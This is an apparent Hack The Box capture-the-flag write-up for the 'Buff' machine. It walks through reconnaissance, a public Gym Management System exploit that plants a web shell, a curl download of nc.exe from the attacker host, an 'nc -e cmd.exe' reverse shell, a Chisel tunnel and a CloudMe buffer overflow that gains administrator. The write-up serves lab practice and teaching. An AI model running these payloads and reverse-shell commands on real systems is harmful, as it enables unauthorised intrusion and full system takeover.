Pages

Search

HTB Buff

$ nmap -A -T4 -p- 10.10.10.198 -Pn

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-31 16:52 CET
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 34.52% done; ETC: 16:55 (0:02:22 remaining)
Stats: 0:02:50 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 83.96% done; ETC: 16:55 (0:00:32 remaining)
Stats: 0:04:14 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.92% done; ETC: 16:56 (0:00:00 remaining)
Nmap scan report for 10.10.10.198
Host is up (0.058s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 262.44 seconds

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u http://10.10.10.198:8080 -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.198:8080
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/10/31 19:32:24 Starting gobuster
===============================================================
http://10.10.10.198:8080/img (Status: 301)
http://10.10.10.198:8080/profile (Status: 301)
http://10.10.10.198:8080/upload (Status: 301)
http://10.10.10.198:8080/license (Status: 200)
http://10.10.10.198:8080/include (Status: 301)
http://10.10.10.198:8080/licenses (Status: 403)
http://10.10.10.198:8080/Profile (Status: 301)
http://10.10.10.198:8080/LICENSE (Status: 200)
http://10.10.10.198:8080/att (Status: 301)
http://10.10.10.198:8080/%20 (Status: 403)
http://10.10.10.198:8080/IMG (Status: 301)
http://10.10.10.198:8080/License (Status: 200)
http://10.10.10.198:8080/ex (Status: 301)
http://10.10.10.198:8080/*checkout* (Status: 403)
http://10.10.10.198:8080/Img (Status: 301)
http://10.10.10.198:8080/Upload (Status: 301)
http://10.10.10.198:8080/boot (Status: 301)
http://10.10.10.198:8080/phpmyadmin (Status: 403)
http://10.10.10.198:8080/webalizer (Status: 403)
http://10.10.10.198:8080/*docroot* (Status: 403)
http://10.10.10.198:8080/* (Status: 403)
http://10.10.10.198:8080/con (Status: 403)
http://10.10.10.198:8080/Include (Status: 301)
http://10.10.10.198:8080/http%3A (Status: 403)
http://10.10.10.198:8080/**http%3a (Status: 403)
http://10.10.10.198:8080/Boot (Status: 301)
http://10.10.10.198:8080/aux (Status: 403)
http://10.10.10.198:8080/*http%3A (Status: 403)
http://10.10.10.198:8080/**http%3A (Status: 403)
http://10.10.10.198:8080/%C0 (Status: 403)
===============================================================
2020/10/31 20:03:00 Finished
===============================================================

Access to http://10.10.10.198:8080/

From this home site page:

Access to https://projectworlds.in

There is a list of different projects.

Here you will find this one: https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/

From this site, you can download the whole project.

$ searchsploit Gym Management System 1.0

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                        |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection                                                                                                                                                        | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass                                                                                                                                                     | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting                                                                                                                                               | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                                                                                     | php/webapps/48506.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Using this exploit (https://www.exploit-db.com/exploits/48506):

$ python2.7 48506.py http://10.10.10.198:8080/

            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>

C:\xampp\htdocs\gym\upload> whoami

�PNG
▒
buff\shaun

C:\xampp\htdocs\gym\upload> dir

�PNG
▒
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

11/11/2020  14:17    <DIR>          .
11/11/2020  14:17    <DIR>          ..
11/11/2020  14:17                53 kamehameha.php
               1 File(s)             53 bytes
               2 Dir(s)   9,815,011,328 bytes free

C:\xampp\htdocs\gym\upload>

A web shell has been upload to the server.
From this point, we can use it to perform some actions from the browser.

This URL can per personalized to perform different actions.

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=<action>

Let’s improve this minimal shell:

C:\xampp\htdocs\gym\upload> curl http://10.10.14.5:8000/nc.exe --output nc.exe

�PNG
▒

C:\xampp\htdocs\gym\upload> dir

�PNG
▒
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

11/11/2020  15:05    <DIR>          .
11/11/2020  15:05    <DIR>          ..
11/11/2020  14:17                53 kamehameha.php
11/11/2020  15:05            59,392 nc.exe
               2 File(s)         59,445 bytes
               2 Dir(s)   9,811,681,280 bytes free

C:\xampp\htdocs\gym\upload>

C:\xampp\htdocs\gym\upload> nc.exe -nv 10.10.14.5 9999 -e cmd.exe

$ nc -lvnp 9999

listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.198] 49807
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>

C:\xampp\htdocs\gym\upload>whoami

buff\shaun

C:\xampp\htdocs\gym\upload>cd c:/users
C:\Users>dir

Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of c:\Users

16/06/2020  19:52    <DIR>          .
16/06/2020  19:52    <DIR>          ..
20/07/2020  11:08    <DIR>          Administrator
16/06/2020  14:08    <DIR>          Public
16/06/2020  14:11    <DIR>          shaun
               0 File(s)              0 bytes
               5 Dir(s)   9,810,792,448 bytes free

C:\Users>cd shaun
C:\Users\shaun\Desktop>type user.txt

57d1XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Enumerating the process on the system,

PS C:\Users\shaun\Downloads> get-process

 Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                             
 -------  ------    -----      -----     ------     --  -- -----------                                 
 431      24    18028       9348              6688   1 ApplicationFrameHost                         
 161      10     1936       1736              4360   1 browser_broker                               
 166      13    17112      16656              2896   0 CloudMe                                      
  40       5     4448       3232              3028   0 cmd                                          
  49       4     1936       2004       0.02   5412   0 cmd                                          
  81       6     3748       3652       6.25   6884   0 cmd                                         
 119       8     5376       3296       1.34   6112   0 conhost                                     
 140       9     5704      11052              7604   0 conhost                                     
 140       9     5652        544     226.83   8180   0 conhost                                     
 616      21     1800       2024               452   0 csrss                                       
 321      18     1616       1428               544   1 csrss                                       
 358      14     3008       3328              4712   1 ctfmon                                       
 242      13     3992       4836              3680   0 dllhost                                     
 187      11     2316       4116              6000   1 dllhost                                     
 665      33    26876      29104               388   1 dwm                                        
1751      64    25372      45516              2560   1 explorer                                      
  44      12    14004      17084               828   0 fontdrvhost                                  
  44      14     8028       6604               836   1 fontdrvhost                                 
 166      28     9604        156       3.25   4428   0 httpd                                       
 511      54    27212       4436   1,562.02   6764   0 httpd                                         
   0       0       56          8                 0   0 Idle                                         
 987      21     4544       7520               696   0 lsass                                         
   0       0      176      37936              1548   0 Memory Compression                           
 778      45    41704      27836              8988   1 Microsoft.Photos                             
 881      46    19932      16384              7016   1 MicrosoftEdge                               
 490      20     5916       4076              7868   1 MicrosoftEdgeCP                             
 389      17     5140       3468              7924   1 MicrosoftEdgeCP                             
 155      10     1932       3288              2988   1 MSASCuiL                                     
 206      13     2860       2808              2240   0 msdtc                                       
 711      72   183892     148804              2848   0 MsMpEng                                     
 166      15   210140       9724     404.91   2684   0 mysqld                                        
  89       8      968       7476      20.13   6432   0 nc                                           
 192      12     3844       4524              5596   0 NisSrv                                       
 559      38    45760      53420      18.98   6088   0 powershell                                     
   0      13      628       2596               104   0 Registry                                     
 381      18     5856      16980              3976   1 RuntimeBroker                               
 116       8     1576       1744              6056   1 RuntimeBroker                               
 425      21     6808      13264              6468   1 RuntimeBroker                               
 278      15     5316      13096              6696   1 RuntimeBroker                               
 141       8     1752       1696              7412   1 RuntimeBroker                               
 280      15     4968      10584              8860   1 RuntimeBroker                               
 716      42    21888      15212              6820   0 SearchIndexer                              
1044      70    68612      85804              6344   1 SearchUI                                     
 371      16     4276       8144              2792   0 SecurityHealthService                       
 587      10     4652       6428               676   0 services                                      
  65       5     2392       2748               320   0 SgrmBroker                                   
 876      35    22892      27352              5000   1 ShellExperienceHost                         
 580      18     6464      12424              4420   1 sihost                                        
  52       3      500        424               348   0 smss                                         
 413      21     5152       4840              2156   0 spoolsv                                     
 330      15     4168       8996               408   0 svchost                                      
  84       5      980        856               804   0 svchost                                 
 ...
 201      12     1752       2868              8720   0 svchost                                     
 122       7     2336       7212              9152   0 svchost                                    
 25   13      0      192         24                 4   0 System                                       
 765      36    14396        668              9128   1 SystemSettings                               
 273      28     5176       7484              4588   1 taskhostw                                   
 350      21     7776      14304              8716   1 taskhostw                                   
 170      12     3252       2748              2800   0 VGAuthService                               
 371      21     9348      10984              2828   0 vmtoolsd                                     
 231      18     3924       4288              7120   1 vmtoolsd                                     
 185      11     2216      11976              6728   0 wermgr                                        
  98       6     1160       1080              7240   0 Windows.WARP.JITService                     
 151      10     1292       1308               532   0 wininit                                     
 247      11     2404       2048               608   1 winlogon                                     
 510      36    15720        352              9140   1 WinStore.App                                 
 331      16    10844      15384              4028   0 WmiPrvSE                                 

PS C:\Users\shaun\Downloads>

We’ve found something interesting… CloudMe v1112

CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software.

https://en.wikipedia.org/wiki/CloudMe

$ searchsploit cloudme

----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                                             | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                                    | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)                                    | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                                   | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)                            | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)                     | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                                        | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                                    | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)                           | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                                            | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)                         | windows_x86-64/remote/44784.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

CloudMe usually runs on port 8888.

Using this exploit (https://www.exploit-db.com/exploits/48389):

We need to create a reverse tunnel to reach this port.

We’re going to use Chisel for this functionality.
https://github.com/jpillora/chisel

C:\xampp\htdocs\gym\upload>chisel.exe client 10.10.14.14:9000 R:8888:127.0.0.1:8888

chisel.exe client 10.10.14.14:9000 R:8888:127.0.0.1:8888
2020/11/22 10:00:25 client: Connecting to ws://10.10.14.14:9000
2020/11/22 10:00:25 client: Connected (Latency 190.6163ms)

$ ./chisel server -p 9000 --reverse

2020/11/22 10:55:09 server: Reverse tunnelling enabled
2020/11/22 10:55:09 server: Fingerprint zILwEVvwdCWQr98N2iDHUgd5VVRA/1hgw6Ml5umDuf0=
2020/11/22 10:55:09 server: Listening on http://0.0.0.0:9000
2020/11/22 11:00:26 server: session#1: tun: proxy#R:8888=>8888: Listening

$ python3 48389.py
$ nc -lvnp 9001

listening on [any] 9001 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.198] 49813
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

C:\Windows\system32>whoami

buff\administrator

C:\Windows\system32>cd c:\Users
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>type root.txt

937cXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *